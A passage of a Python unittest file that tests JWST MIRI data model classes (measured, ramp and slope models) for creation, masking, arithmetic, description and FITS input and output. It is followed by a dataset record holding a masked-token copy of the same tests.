self.assertTrue( np.allclose(c4x1, newdp1.dq) )
# 5x1 is not broadcastable onto 4x3 and this statement should fail.
# NOTE: Unfortunately this test also issues a warning message,
# "'MiriMeasuredModel' object has no attribute '_real_cls'".
# Turning off warnings does not stop this message from appearing.
self.assertRaises(TypeError, MiriMeasuredModel, data=a4x3,
error=b4x3, quality=c5x1)
# Combine two broadcastable object mathematically.
# The + and - operations should be commutative and the result
# should be saveable to a FITS file.
newdp2 = MiriMeasuredModel(data=a4x1, err=b4x1, dq=c4x1)
result1 = newdp1 + newdp2
result2 = newdp2 + newdp1
self.assertEqual(result1.data.shape, result2.data.shape)
self.assertTrue( np.allclose(result1.data, result2.data) )
self.assertTrue( np.allclose(result1.err, result2.err) )
self.assertTrue( np.allclose(result1.dq, result2.dq) )
result1.save(self.testfile1, overwrite=True)
result2.save(self.testfile2, overwrite=True)
del result1, result2
result1 = newdp1 * newdp2
result2 = newdp2 * newdp1
self.assertEqual(result1.data.shape, result2.data.shape)
self.assertTrue( np.allclose(result1.data, result2.data) )
self.assertTrue( np.allclose(result1.err, result2.err) )
self.assertTrue( np.allclose(result1.dq, result2.dq) )
result1.save(self.testfile1, overwrite=True)
result2.save(self.testfile2, overwrite=True)
del result1, result2
# The - and / operations are not commutative, but the data shape
# should be consistent and the quality arrays should be combined
# in the same way.
result1 = newdp1 - newdp2
result2 = newdp2 - newdp1
self.assertEqual(result1.data.shape, result2.data.shape)
self.assertTrue( np.allclose(result1.err, result2.err) )
self.assertTrue( np.allclose(result1.dq, result2.dq) )
result1.save(self.testfile1, overwrite=True)
result2.save(self.testfile2, overwrite=True)
del result1, result2
result1 = newdp1 / newdp2
result2 = newdp2 / newdp1
self.assertEqual(result1.data.shape, result2.data.shape)
# The errors resulting from division depend on the order
# of the operation.
self.assertTrue( np.allclose(result1.dq, result2.dq) )
result1.save(self.testfile1, overwrite=True)
result2.save(self.testfile2, overwrite=True)
del result1, result2
def test_description(self):
# Test that the querying and description functions work.
# For the test to pass these need to run without error
# and generate non-null strings.
descr = str(self.simpleproduct)
self.assertIsNotNone(descr)
del descr
descr = repr(self.simpleproduct)
self.assertIsNotNone(descr)
del descr
descr = self.simpleproduct.stats()
self.assertIsNotNone(descr)
del descr
descr = str(self.dataproduct)
self.assertIsNotNone(descr)
del descr
descr = str(self.dataproduct)
self.assertIsNotNone(descr)
del descr
descr = self.dataproduct.stats()
self.assertIsNotNone(descr)
del descr
# Attempt to access the SCI, ERROR and DQ arrays through attributes.
descr = str(self.dataproduct.data)
self.assertIsNotNone(descr)
del descr
descr = str(self.dataproduct.err)
self.assertIsNotNone(descr)
del descr
descr = str(self.dataproduct.dq)
self.assertIsNotNone(descr)
del descr
class TestMiriRampModel(unittest.TestCase):
# Most of the necessary tests are already carried out by
# the TestMiriMeasuredModel class.
def setUp(self):
# Create a ramp data product.
# NOTE: A ramp product does not contain an ERR array.
self.a1 = [[10,20,30,40], [50,60,70,80], [90,100,110,120]]
self.c1 = [[1,0,0,0], [0,1,0,1], [1,0,1,0]]
self.c2 = [[0,1,1,0], [1,0,0,1], [1,0,1,0]]
self.acube = [self.a1,self.a1,self.a1]
self.ccube = [self.c1,self.c2,self.c1]
self.ahyper = [self.acube,self.acube]
self.chyper = [self.ccube,self.ccube]
self.refout = np.ones_like(self.chyper)
self.dataproduct = MiriRampModel(data=self.ahyper, refout=self.refout,
pixeldq=self.c1,
dq_def=pixeldq_flags,
groupdq=self.chyper,
groupdq_def=groupdq_flags)
# Add some example metadata.
self.dataproduct.set_housekeeping_metadata('MIRI EC', 'Joe Bloggs',
'V1.0')
self.dataproduct.set_observation_metadata()
self.dataproduct.set_target_metadata(0.0, 0.0)
self.dataproduct.set_instrument_metadata(detector='MIRIFULONG',
channel='1',
ccc_pos='OPEN',
deck_temperature=11.0,
detector_temperature=6.0)
self.dataproduct.set_exposure_metadata(readpatt='FAST',
nints=1, ngroups=1,
frame_time=1.0,
integration_time=10.0,
group_time=10.0,
reset_time=0, frame_resets=3)
self.testfile = "MiriRampModel_test.fits"
def tearDown(self):
# Tidy up
del self.a1, self.c1, self.c2
del self.acube, self.ccube
del self.ahyper, self.chyper
del self.dataproduct
# Remove temporary file, if able to.
if os.path.isfile(self.testfile):
try:
os.remove(self.testfile)
except Exception as e:
strg = "Could not remove temporary file, " + self.testfile + \
"\n " + str(e)
warnings.warn(strg)
def test_creation(self):
# Test that any of the quality arrays are optional.
b1 = [[1,2,3,4], [5,6,7,8], [9,10,11,12]]
bcube = [b1,b1,b1]
bhyper = [bcube,bcube]
# 1) Data array only. Data array must exist and be non-empty.
# The quality arrays must be 2-D and 4-D.
# Unspecified arrays must be filled with default values.
newdp1 = MiriRampModel(data=self.ahyper)
self.assertIsNotNone(newdp1.data)
self.assertGreater(len(newdp1.data), 0)
# Assumes default is 0.0 - see schema
self.assertIsNotNone(newdp1.pixeldq)
self.assertTrue(newdp1.pixeldq.ndim == 2)
# Assumes default is 0 - see schema
# FIXME: The pixeldq array ends up containing null values.
#self.assertEqual(np.mean(newdp1.pixeldq), 0)
self.assertIsNotNone(newdp1.groupdq)
self.assertTrue(newdp1.groupdq.ndim == 4)
# Assumes default is 0 - see schema
self.assertEqual(np.mean(newdp1.groupdq), 0)
descr1 = str(newdp1)
del newdp1, descr1
# 2) Data and both quality arrays. All arrays must exist,
# be non-empty and be the shape specified.
newdp3 = MiriRampModel(data=self.ahyper, pixeldq=self.c1,
groupdq=self.chyper)
self.assertIsNotNone(newdp3.data)
self.assertGreater(len(newdp3.data), 0)
# The pixeldq array must not be full of default values.
self.assertIsNotNone(newdp3.pixeldq)
self.assertTrue(newdp3.pixeldq.ndim == 2)
self.assertNotEqual(np.mean(newdp3.pixeldq), 0)
self.assertIsNotNone(newdp3.groupdq)
self.assertTrue(newdp3.groupdq.ndim == 4)
# The groupdq array must not be full of default values.
self.assertNotEqual(np.mean(newdp3.groupdq), 0)
descr3 = str(newdp3)
del newdp3, descr3
# 3) Data and pixeldq array only. All arrays must exist,
# be non-empty and be the shape specified.
newdp4 = MiriRampModel(data=self.ahyper, pixeldq=self.c1)
self.assertIsNotNone(newdp4.data)
self.assertGreater(len(newdp4.data), 0)
# The pixeldq array must not be full of default values.
self.assertIsNotNone(newdp4.pixeldq)
self.assertTrue(newdp4.pixeldq.ndim == 2)
self.assertNotEqual(np.mean(newdp4.pixeldq), 0)
self.assertIsNotNone(newdp4.groupdq)
self.assertTrue(newdp4.groupdq.ndim == 4)
descr4 = str(newdp4)
del newdp4, descr4
# 4) Data and groupdq array only. All arrays must exist,
# be non-empty and be the shape specified.
newdp5 = MiriRampModel(data=self.ahyper, groupdq=self.chyper)
self.assertIsNotNone(newdp5.data)
self.assertGreater(len(newdp5.data), 0)
self.assertIsNotNone(newdp5.pixeldq)
self.assertTrue(newdp5.pixeldq.ndim == 2)
# The groupdq array must not be full of default values.
self.assertIsNotNone(newdp5.groupdq)
self.assertTrue(newdp5.groupdq.ndim == 4)
# The groupdq array must not be full of default values.
self.assertNotEqual(np.mean(newdp5.groupdq), 0)
descr5 = str(newdp5)
del newdp5, descr5
# It should be possible to set up an empty data product with
# a specified 4-D shape. Data array should be
# initialised to the same shape.
emptydp = MiriRampModel( (2,2,2,2) )
self.assertIsNotNone(emptydp.data)
self.assertEqual(emptydp.data.shape, (2,2,2,2))
self.assertIsNotNone(emptydp.pixeldq)
#self.assertEqual(emptydp.pixeldq.shape, (2,2))
self.assertIsNotNone(emptydp.groupdq)
self.assertEqual(emptydp.groupdq.shape, (2,2,2,2))
descr = str(emptydp)
self.assertIsNotNone(descr)
del emptydp, descr
# A null data product can also be created and populated
# with data later.
nulldp = MiriRampModel( )
descr1 = str(nulldp)
self.assertIsNotNone(descr1)
nulldp.data = np.asarray(self.ahyper)
self.assertIsNotNone(nulldp.pixeldq)
self.assertIsNotNone(nulldp.groupdq)
descr2 = str(nulldp)
self.assertIsNotNone(descr2)
del nulldp, descr1, descr2
# Creating an object with other than 4 dimensions must fail.
a1d = [10,20,30,40]
c1d = [1,0,0,0]
self.assertRaises(ValueError, MiriRampModel, data=a1d, pixeldq=c1d)
a2d = [[10,20,30,40], [50,60,70,80], [90,100,110,120]]
c2d = [[1,0,0,0], [0,1,0,1], [1,0,1,0]]
self.assertRaises(ValueError, MiriRampModel, data=a2d, groupdq=c2d)
a3d = [a2d, a2d, a2d]
c3d = [c2d, c2d, c2d]
self.assertRaises(ValueError, MiriRampModel, data=a3d, pixeldq=c3d)
self.assertRaises(ValueError, MiriRampModel, data=a3d, groupdq=c3d)
# The pixeldq array must be 2-D.
self.assertRaises(ValueError, MiriRampModel, data=self.ahyper,
pixeldq=self.ccube)
# The groupdq array must be 4-D.
self.assertRaises(ValueError, MiriRampModel, data=self.ahyper,
groupdq=self.c1)
def test_masking(self):
# Ramp data must have a dq array which gives a view of one
# or both of the pixeldq and groupdq masks
self.assertIsNotNone(self.dataproduct.dq)
# Create a data product masked by the pixeldq array.
# The dq and pixeldq arrays must be the same
mask1 = MiriRampModel(data=self.ahyper, pixeldq=self.c1,
groupdq=self.chyper, maskwith='pixeldq')
self.assertIsNotNone(mask1.pixeldq)
self.assertGreater(len(mask1.pixeldq), 0)
self.assertIsNotNone(mask1.dq)
self.assertGreater(len(mask1.dq), 0)
self.assertEqual(mask1.dq.shape, mask1.pixeldq.shape)
self.assertTrue(np.all( mask1.dq == mask1.pixeldq ))
del mask1
# Create a data product masked by the groupdq array.
# The dq and groupdq arrays must be the same
mask2 = MiriRampModel(data=self.ahyper, pixeldq=self.c1,
groupdq=self.chyper, maskwith='groupdq')
self.assertIsNotNone(mask2.groupdq)
self.assertGreater(len(mask2.groupdq), 0)
self.assertIsNotNone(mask2.dq)
self.assertGreater(len(mask2.dq), 0)
self.assertEqual(mask2.dq.shape, mask2.groupdq.shape)
self.assertTrue(np.all( mask2.dq == mask2.groupdq ))
del mask2
# Create a data product masked by both pixeldq and groupdq arrays.
# The result must have the same shape as the groupdq array but be
# a combination of both masks.
mask3 = MiriRampModel(data=self.ahyper, pixeldq=self.c1,
groupdq=self.chyper, maskwith='both')
self.assertIsNotNone(mask3.pixeldq)
self.assertGreater(len(mask3.pixeldq), 0)
self.assertIsNotNone(mask3.groupdq)
self.assertGreater(len(mask3.groupdq), 0)
self.assertIsNotNone(mask3.dq)
self.assertGreater(len(mask3.dq), 0)
self.assertEqual(mask3.dq.shape, mask3.groupdq.shape)
expected = mask3.groupdq | mask3.pixeldq
self.assertTrue(np.all( mask3.dq == expected ))
del mask3
def test_arithmetic(self):
# The ramp data model supports all the arithmetic operations
# supported by the MiriMeasuredModel. The following are exceptions
# specific to the ramp model.
# Create a data model in which the DATA and DQ arrays have different
# shapes.
testdp = MiriRampModel(data=self.ahyper, pixeldq=self.c1,
groupdq=self.chyper, maskwith='both')
descr = str(testdp)
self.assertIsNotNone(descr)
del descr
# Suppress warning about the DQ array being propagated only from GROUPDQ
with warnings.catch_warnings():
warnings.simplefilter("ignore")
# Check the product can be combined with itself
double = testdp * 2.0
self.assertIsNotNone(double.data)
self.assertGreater(len(double.data), 0)
expected = double.data * 2.0
self.assertTrue(np.all( (double.data - expected) < 0.001 ))
descr = str(double)
self.assertIsNotNone(descr)
del descr
# When this is combined with another data product, the DATA
# array is masked with both the pixeldq and groupdq arrays.
warnings.simplefilter("ignore")
result = self.dataproduct + testdp
self.assertIsNotNone(result.data)
self.assertGreater(len(result.data), 0)
self.assertIsNotNone(result.dq)
self.assertGreater(len(result.dq), 0)
descr = str(result)
self.assertIsNotNone(descr)
del descr
def test_fitsio(self):
# Suppress metadata warnings
with warnings.catch_warnings():
warnings.simplefilter("ignore")
# Check that the data product can be written to a FITS
# file and read back again without changing the data.
self.dataproduct.save(self.testfile, overwrite=True)
with MiriRampModel(self.testfile) as readback:
assert_products_equal( self, self.dataproduct, readback,
arrays=['data', 'refout', 'pixeldq','groupdq'],
tables=['pixeldq_def', 'groupdq_def'] )
del readback
def test_description(self):
# Test that the querying and description functions work.
# For the test to pass these need to run without error
# and generate non-null strings.
descr = str(self.dataproduct)
self.assertIsNotNone(descr)
del descr
descr = repr(self.dataproduct)
self.assertIsNotNone(descr)
del descr
descr = self.dataproduct.stats()
self.assertIsNotNone(descr)
del descr
# Attempt to access the SCI, REFOUR and DQ arrays through attributes.
descr = str(self.dataproduct.data)
self.assertIsNotNone(descr)
del descr
descr = str(self.dataproduct.refout)
self.assertIsNotNone(descr)
del descr
descr = str(self.dataproduct.dq)
self.assertIsNotNone(descr)
del descr
class TestMiriSlopeModel(unittest.TestCase):
# Most of the necessary tests are already carried out by
# the TestMiriMeasuredModel class.
def setUp(self):
# Create a slope data product.
a1 = [[10,20,30,40], [50,60,70,80], [90,100,110,120]]
b1 = [[1,2,3,4], [5,6,7,8], [9,10,11,12]]
c1 = [[1,0,0,0], [0,1,0,1], [1,0,1,0]]
acube = [a1,a1,a1]
bcube = [b1,b1,b1]
ccube = [c1,c1,c1]
dcube = [a1,b1,a1]
self.dataproduct = MiriSlopeModel(data=acube, err=bcube,
dq=ccube, dq_def=master_flags,
zeropt=dcube, fiterr=dcube)
# Add some example metadata.
self.dataproduct.set_housekeeping_metadata('MIRI EC', 'Joe Bloggs',
'V1.0')
self.dataproduct.set_observation_metadata()
self.dataproduct.set_target_metadata(0.0, 0.0)
self.dataproduct.set_instrument_metadata(detector='MIRIMAGE',
filt='F2550W',
ccc_pos='OPEN',
deck_temperature=11.0,
detector_temperature=6.0)
self.dataproduct.set_exposure_metadata(readpatt='SLOW',
nints=3, ngroups=10,
frame_time=1.0,
integration_time=100.0,
group_time=1000.0,
reset_time=0, frame_resets=3)
self.testfile = "MiriSlopeModel_test.fits"
def tearDown(self):
# Tidy up
del self.dataproduct
# Remove temporary file, if able to.
if os.path.isfile(self.testfile):
try:
os.remove(self.testfile)
except Exception as e:
strg = "Could not remove temporary file, " + self.testfile + \
"\n " + str(e)
warnings.warn(strg)
def test_creation(self):
# Creating an object with other than 3 dimensions must fail.
a1d = [10,20,30,40]
b1d = [1,2,3,4]
c1d = [1,0,0,0]
self.assertRaises(ValueError, MiriSlopeModel, data=a1d, err=b1d,
dq=c1d)
a2d = [a1d, a1d, a1d]
b2d = [b1d, b1d, b1d]
c2d = [c1d, c1d, c1d]
self.assertRaises(ValueError, MiriSlopeModel, data=a2d, err=b2d,
dq=c2d)
a3d = [a2d, a2d]
b3d = [b2d, b2d]
c3d = [c2d, c2d]
a4d = [a3d, a3d]
b4d = [b3d, b3d]
c4d = [c3d, c3d]
self.assertRaises(ValueError, MiriSlopeModel, data=a4d, err=b4d,
dq=c4d)
def test_copy(self):
# Test that a copy can be made of the data product.
datacopy = self.dataproduct.copy()
self.assertIsNotNone(datacopy)
assert_products_equal( self, self.dataproduct, datacopy,
arrays=['data', 'err', 'dq',
'nreads', 'readsat', 'ngoodseg',
'zeropt', 'fiterr'],
tables='dq_def' )
del datacopy
def test_fitsio(self):
# Suppress metadata warnings
with warnings.catch_warnings():
warnings.simplefilter("ignore")
# Check that the data product can be written to a FITS
# file and read back again without changing the data.
self.dataproduct.save(self.testfile, overwrite=True)
with MiriSlopeModel(self.testfile) as readback:
assert_products_equal( self, self.dataproduct, readback,
arrays=['data', 'err', 'dq',
'nreads', 'readsat', 'ngoodseg',
'zeropt', 'fiterr'],
tables='dq_def' )
del readback
def test_description(self):
# Test that the querying and description functions work.
# For this test to pass these only need to run without error.
descr = str(self.dataproduct)
self.assertIsNotNone(descr)
del descr
descr = repr(self.dataproduct)
self.assertIsNotNone(descr)
del descr
descr = self.dataproduct.stats()
self.assertIsNotNone(descr)
del descr
# Attempt to access the SCI and DQ arrays through attributes.
descr = str(self.dataproduct.data)
self.assertIsNotNone(descr)
del descr
descr = str(self.dataproduct.dq)
self.assertIsNotNone(descr)
del descr
# If being run as a main program, run the tests.
if __name__ == '__main__':
unittest.main()
|
normal
|
{
"blob_id": "644b4a2f0e8ce95e669c9c01df111c943e0c4af2",
"index": 3417,
"step-1": "<mask token>\n\n\nclass TestMiriMeasuredModel(unittest.TestCase):\n <mask token>\n <mask token>\n\n def test_creation(self):\n dq_def_names = list(MiriMeasuredModel.dq_def_names)\n schema_names = list(self.dataproduct.get_field_names('dq_def'))\n self.assertEqual(dq_def_names, schema_names,\n \"'dq_def_names' class variable does not match schema\")\n a2 = [[10, 20, 30, 40], [50, 60, 70, 80], [90, 100, 110, 120]]\n b2 = [[1, 2, 3, 4], [5, 6, 7, 8], [9, 10, 11, 12]]\n c2 = [[1, 0, 0, 0], [0, 1, 0, 1], [1, 0, 1, 0]]\n newdp1 = MiriMeasuredModel(data=a2)\n self.assertIsNotNone(newdp1.data)\n self.assertGreater(len(newdp1.data), 0)\n self.assertIsNotNone(newdp1.err)\n self.assertEqual(newdp1.err.shape, newdp1.data.shape)\n self.assertAlmostEqual(np.mean(newdp1.err), 0.0)\n self.assertIsNotNone(newdp1.dq)\n self.assertEqual(newdp1.dq.shape, newdp1.dq.shape)\n self.assertEqual(np.mean(newdp1.dq), 0)\n descr1 = str(newdp1)\n self.assertIsNotNone(descr1)\n del newdp1, descr1\n newdp2 = MiriMeasuredModel(data=a2, err=b2)\n self.assertIsNotNone(newdp2.data)\n self.assertGreater(len(newdp2.data), 0)\n self.assertIsNotNone(newdp2.err)\n self.assertEqual(newdp2.err.shape, newdp2.data.shape)\n self.assertNotAlmostEqual(np.mean(newdp2.err), 0.0)\n self.assertIsNotNone(newdp2.dq)\n self.assertEqual(newdp2.dq.shape, newdp2.dq.shape)\n self.assertEqual(np.mean(newdp2.dq), 0)\n descr2 = str(newdp2)\n self.assertIsNotNone(descr2)\n del newdp2, descr2\n newdp3 = MiriMeasuredModel(data=a2, err=b2, dq=c2)\n self.assertIsNotNone(newdp3.data)\n self.assertGreater(len(newdp3.data), 0)\n self.assertIsNotNone(newdp3.err)\n self.assertEqual(newdp3.err.shape, newdp3.data.shape)\n self.assertNotAlmostEqual(np.mean(newdp3.err), 0.0)\n self.assertIsNotNone(newdp3.dq)\n self.assertEqual(newdp3.dq.shape, newdp3.dq.shape)\n self.assertNotEqual(np.mean(newdp3.dq), 0)\n descr3 = str(newdp3)\n self.assertIsNotNone(descr3)\n del newdp3, descr3\n emptydp = MiriMeasuredModel((4, 4))\n self.assertIsNotNone(emptydp.data)\n self.assertEqual(emptydp.data.shape, (4, 4))\n self.assertIsNotNone(emptydp.err)\n self.assertEqual(emptydp.err.shape, (4, 4))\n self.assertIsNotNone(emptydp.dq)\n self.assertEqual(emptydp.dq.shape, (4, 4))\n descr = str(emptydp)\n self.assertIsNotNone(descr)\n del emptydp, descr\n nulldp = MiriMeasuredModel()\n descr1 = str(nulldp)\n self.assertIsNotNone(descr1)\n nulldp.data = np.asarray(a2)\n self.assertIsNotNone(nulldp.err)\n self.assertIsNotNone(nulldp.dq)\n descr2 = str(nulldp)\n self.assertIsNotNone(descr2)\n del nulldp, descr1, descr2\n scalardp = MiriMeasuredModel(data=42)\n self.assertEqual(scalardp.data, 42)\n self.assertIsNotNone(scalardp.err)\n self.assertIsNotNone(scalardp.dq)\n descr = str(scalardp)\n self.assertIsNotNone(descr)\n del scalardp, descr\n self.assertRaises(ValueError, MiriMeasuredModel, init=[])\n self.assertRaises(ValueError, MiriMeasuredModel, init=42)\n self.assertRaises(ValueError, MiriMeasuredModel, init='not a file name'\n )\n self.assertRaises(IOError, MiriMeasuredModel, init='nosuchfile.fits')\n self.assertRaises(ValueError, MiriMeasuredModel, data='badstring')\n\n def test_metadata(self):\n kwstrg = self.simpleproduct.find_fits_keyword('TELESCOP',\n return_result=True)\n self.assertIsNotNone(kwstrg)\n telname = self.simpleproduct[kwstrg[0]]\n self.assertEqual(telname, 'JWST')\n telname = self.simpleproduct.meta.telescope\n self.assertEqual(telname, 'JWST')\n telname = self.simpleproduct.get_fits_keyword('TELESCOP')\n self.assertEqual(telname, 'JWST')\n kwstrg = self.simpleproduct.find_fits_keyword('INSTRUME',\n return_result=True)\n self.assertIsNotNone(kwstrg)\n insname = self.simpleproduct[kwstrg[0]]\n self.assertEqual(insname, 'MIRI')\n insname = self.simpleproduct.meta.instrument.name\n self.assertEqual(insname, 'MIRI')\n insname = self.simpleproduct.get_fits_keyword('INSTRUME')\n self.assertEqual(insname, 'MIRI')\n self.simpleproduct.add_history('History 1')\n self.simpleproduct.add_history('History 2')\n self.simpleproduct.add_history('History 3')\n self.assertGreaterEqual(len(self.simpleproduct.get_history()), 3)\n strg = self.simpleproduct.get_history_str()\n self.assertIsNotNone(strg)\n self.assertGreater(len(strg), 0)\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n def test_arithmetic(self):\n a2 = [[90, 80, 70, 60], [50, 40, 30, 20], [10, 0, -10, -20]]\n b2 = [[1, 2, 3, 4], [5, 6, 7, 8], [9, 10, 11, 12]]\n c2 = [[0, 1, 1, 0], [0, 2, 0, 2], [1, 0, 1, 0]]\n newdp = MiriMeasuredModel(data=a2, err=b2, dq=c2)\n newsimple = self.simpleproduct - self.simpleproduct\n self.assertAlmostEqual(newsimple.data.all(), 0.0)\n del newsimple\n result = self.dataproduct + 42\n test1 = self.dataproduct.data + 42\n test2 = result.data\n self.assertEqual(test1.all(), test2.all())\n del result\n result = self.dataproduct + newdp\n test1 = self.dataproduct.data + newdp.data\n test2 = result.data\n self.assertEqual(test1.all(), test2.all())\n expectedsq = self.error[1][0] * self.error[1][0] + b2[1][0] * b2[1][0]\n actualsq = result.err[1, 0] * result.err[1, 0]\n self.assertAlmostEqual(expectedsq, actualsq)\n expectedsq = self.error[2][1] * self.error[2][1] + b2[2][1] * b2[2][1]\n actualsq = result.err[2, 1] * result.err[2, 1]\n self.assertAlmostEqual(expectedsq, actualsq)\n del result\n result = self.dataproduct - 42\n test1 = self.dataproduct.data - 42\n test2 = result.data\n self.assertEqual(test1.all(), test2.all())\n del result\n result = self.dataproduct - newdp\n test1 = self.dataproduct.data - newdp.data\n test2 = result.data\n self.assertEqual(test1.all(), test2.all())\n expectedsq = self.error[1][0] * self.error[1][0] + b2[1][0] * b2[1][0]\n actualsq = result.err[1, 0] * result.err[1, 0]\n self.assertAlmostEqual(expectedsq, actualsq)\n expectedsq = self.error[2][1] * self.error[2][1] + b2[2][1] * b2[2][1]\n actualsq = result.err[2, 1] * result.err[2, 1]\n self.assertAlmostEqual(expectedsq, actualsq)\n del result\n result = self.dataproduct + newdp - newdp\n test1 = self.dataproduct.data\n test2 = result.data\n self.assertEqual(test1.all(), test2.all())\n del result\n result = self.dataproduct * 3\n test1 = self.dataproduct.data * 3\n test2 = result.data\n self.assertEqual(test1.all(), test2.all())\n del result\n result = self.dataproduct * newdp\n test1 = self.dataproduct.data * newdp.data\n test2 = result.data\n self.assertEqual(test1.all(), test2.all())\n err1 = self.dataproduct.err\n da1 = self.dataproduct.data\n err2 = newdp.err\n da2 = newdp.data\n expectedErr = np.sqrt(err1 * err1 * da2 * da2 + err2 * err2 * da1 * da1\n )\n self.assertTrue(np.array_equal(expectedErr, result.err))\n del result, da1, da2, err1, err2, expectedErr\n result = self.dataproduct / 3.0\n test1 = self.dataproduct.data / 3.0\n test2 = result.data\n self.assertAlmostEqual(test1.all(), test2.all())\n del test1, test2, result\n self.assertRaises(ValueError, self.dataproduct.__truediv__, 0.0)\n with warnings.catch_warnings():\n warnings.simplefilter('ignore')\n result = self.dataproduct / newdp\n test1 = self.dataproduct.data / newdp.data\n test2 = result.data\n self.assertEqual(test1.all(), test2.all())\n dat = self.dataproduct.data[1][1]\n newdat = newdp.data[1][1]\n resultErr = result.err[1][1]\n dpErr = self.dataproduct.err[1][1]\n newdpErr = newdp.err[1][1]\n expectErr = np.sqrt(dpErr * dpErr / (newdat * newdat) + \n newdpErr * newdpErr * dat * dat / (newdat * newdat * newdat *\n newdat))\n self.assertEqual(expectErr, resultErr)\n del test1, test2, result\n newdp2 = newdp * 2\n newdp3 = newdp * 3\n newdp4 = newdp2 + newdp3\n result = (self.dataproduct - newdp) * newdp2 / newdp3 + newdp4\n del newdp, newdp2, newdp3, newdp4\n del result\n <mask token>\n <mask token>\n\n\nclass TestMiriRampModel(unittest.TestCase):\n\n def setUp(self):\n self.a1 = [[10, 20, 30, 40], [50, 60, 70, 80], [90, 100, 110, 120]]\n self.c1 = [[1, 0, 0, 0], [0, 1, 0, 1], [1, 0, 1, 0]]\n self.c2 = [[0, 1, 1, 0], [1, 0, 0, 1], [1, 0, 1, 0]]\n self.acube = [self.a1, self.a1, self.a1]\n self.ccube = [self.c1, self.c2, self.c1]\n self.ahyper = [self.acube, self.acube]\n self.chyper = [self.ccube, self.ccube]\n self.refout = np.ones_like(self.chyper)\n self.dataproduct = MiriRampModel(data=self.ahyper, refout=self.\n refout, pixeldq=self.c1, dq_def=pixeldq_flags, groupdq=self.\n chyper, groupdq_def=groupdq_flags)\n self.dataproduct.set_housekeeping_metadata('MIRI EC', 'Joe Bloggs',\n 'V1.0')\n self.dataproduct.set_observation_metadata()\n self.dataproduct.set_target_metadata(0.0, 0.0)\n self.dataproduct.set_instrument_metadata(detector='MIRIFULONG',\n channel='1', ccc_pos='OPEN', deck_temperature=11.0,\n detector_temperature=6.0)\n self.dataproduct.set_exposure_metadata(readpatt='FAST', nints=1,\n ngroups=1, frame_time=1.0, integration_time=10.0, group_time=\n 10.0, reset_time=0, frame_resets=3)\n self.testfile = 'MiriRampModel_test.fits'\n\n def tearDown(self):\n del self.a1, self.c1, self.c2\n del self.acube, self.ccube\n del self.ahyper, self.chyper\n del self.dataproduct\n if os.path.isfile(self.testfile):\n try:\n os.remove(self.testfile)\n except Exception as e:\n strg = ('Could not remove temporary file, ' + self.testfile +\n '\\n ' + str(e))\n warnings.warn(strg)\n\n def test_creation(self):\n b1 = [[1, 2, 3, 4], [5, 6, 7, 8], [9, 10, 11, 12]]\n bcube = [b1, b1, b1]\n bhyper = [bcube, bcube]\n newdp1 = MiriRampModel(data=self.ahyper)\n self.assertIsNotNone(newdp1.data)\n self.assertGreater(len(newdp1.data), 0)\n self.assertIsNotNone(newdp1.pixeldq)\n self.assertTrue(newdp1.pixeldq.ndim == 2)\n self.assertIsNotNone(newdp1.groupdq)\n self.assertTrue(newdp1.groupdq.ndim == 4)\n self.assertEqual(np.mean(newdp1.groupdq), 0)\n descr1 = str(newdp1)\n del newdp1, descr1\n newdp3 = MiriRampModel(data=self.ahyper, pixeldq=self.c1, groupdq=\n self.chyper)\n self.assertIsNotNone(newdp3.data)\n self.assertGreater(len(newdp3.data), 0)\n self.assertIsNotNone(newdp3.pixeldq)\n self.assertTrue(newdp3.pixeldq.ndim == 2)\n self.assertNotEqual(np.mean(newdp3.pixeldq), 0)\n self.assertIsNotNone(newdp3.groupdq)\n self.assertTrue(newdp3.groupdq.ndim == 4)\n self.assertNotEqual(np.mean(newdp3.groupdq), 0)\n descr3 = str(newdp3)\n del newdp3, descr3\n newdp4 = MiriRampModel(data=self.ahyper, pixeldq=self.c1)\n self.assertIsNotNone(newdp4.data)\n self.assertGreater(len(newdp4.data), 0)\n self.assertIsNotNone(newdp4.pixeldq)\n self.assertTrue(newdp4.pixeldq.ndim == 2)\n self.assertNotEqual(np.mean(newdp4.pixeldq), 0)\n self.assertIsNotNone(newdp4.groupdq)\n self.assertTrue(newdp4.groupdq.ndim == 4)\n descr4 = str(newdp4)\n del newdp4, descr4\n newdp5 = MiriRampModel(data=self.ahyper, groupdq=self.chyper)\n self.assertIsNotNone(newdp5.data)\n self.assertGreater(len(newdp5.data), 0)\n self.assertIsNotNone(newdp5.pixeldq)\n self.assertTrue(newdp5.pixeldq.ndim == 2)\n self.assertIsNotNone(newdp5.groupdq)\n self.assertTrue(newdp5.groupdq.ndim == 4)\n self.assertNotEqual(np.mean(newdp5.groupdq), 0)\n descr5 = str(newdp5)\n del newdp5, descr5\n emptydp = MiriRampModel((2, 2, 2, 2))\n self.assertIsNotNone(emptydp.data)\n self.assertEqual(emptydp.data.shape, (2, 2, 2, 2))\n self.assertIsNotNone(emptydp.pixeldq)\n self.assertIsNotNone(emptydp.groupdq)\n self.assertEqual(emptydp.groupdq.shape, (2, 2, 2, 2))\n descr = str(emptydp)\n self.assertIsNotNone(descr)\n del emptydp, descr\n nulldp = MiriRampModel()\n descr1 = str(nulldp)\n self.assertIsNotNone(descr1)\n nulldp.data = np.asarray(self.ahyper)\n self.assertIsNotNone(nulldp.pixeldq)\n self.assertIsNotNone(nulldp.groupdq)\n descr2 = str(nulldp)\n self.assertIsNotNone(descr2)\n del nulldp, descr1, descr2\n a1d = [10, 20, 30, 40]\n c1d = [1, 0, 0, 0]\n self.assertRaises(ValueError, MiriRampModel, data=a1d, pixeldq=c1d)\n a2d = [[10, 20, 30, 40], [50, 60, 70, 80], [90, 100, 110, 120]]\n c2d = [[1, 0, 0, 0], [0, 1, 0, 1], [1, 0, 1, 0]]\n self.assertRaises(ValueError, MiriRampModel, data=a2d, groupdq=c2d)\n a3d = [a2d, a2d, a2d]\n c3d = [c2d, c2d, c2d]\n self.assertRaises(ValueError, MiriRampModel, data=a3d, pixeldq=c3d)\n self.assertRaises(ValueError, MiriRampModel, data=a3d, groupdq=c3d)\n self.assertRaises(ValueError, MiriRampModel, data=self.ahyper,\n pixeldq=self.ccube)\n self.assertRaises(ValueError, MiriRampModel, data=self.ahyper,\n groupdq=self.c1)\n\n def test_masking(self):\n self.assertIsNotNone(self.dataproduct.dq)\n mask1 = MiriRampModel(data=self.ahyper, pixeldq=self.c1, groupdq=\n self.chyper, maskwith='pixeldq')\n self.assertIsNotNone(mask1.pixeldq)\n self.assertGreater(len(mask1.pixeldq), 0)\n self.assertIsNotNone(mask1.dq)\n self.assertGreater(len(mask1.dq), 0)\n 